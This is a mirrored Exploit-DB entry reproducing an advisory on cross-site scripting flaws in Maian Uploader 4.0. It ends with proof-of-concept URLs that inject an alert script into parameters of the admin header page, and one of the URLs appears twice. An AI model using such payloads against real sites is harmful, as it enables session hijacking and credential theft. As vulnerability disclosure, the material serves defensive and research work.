exploit-db-mirror/platforms/php/webapps/31743.txt
Offensive Security c47758095a Updated 02_20_2014
2014-02-20 04:27:43 +00:00

11 lines
824 B
Text
Executable file

source: http://www.securityfocus.com/bid/29051/info
Maian Uploader is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Maian Uploader 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/admin/inc/header.php?msg_charset="<script>alert(&#039;xss&#039;)</script>
http://www.example.com/admin/inc/header.php?msg_header9="<script>alert(&#039;xss&#039;)</script>
http://www.example.com/admin/inc/header.php?msg_header9="<script>alert(&#039;xss&#039;)</script>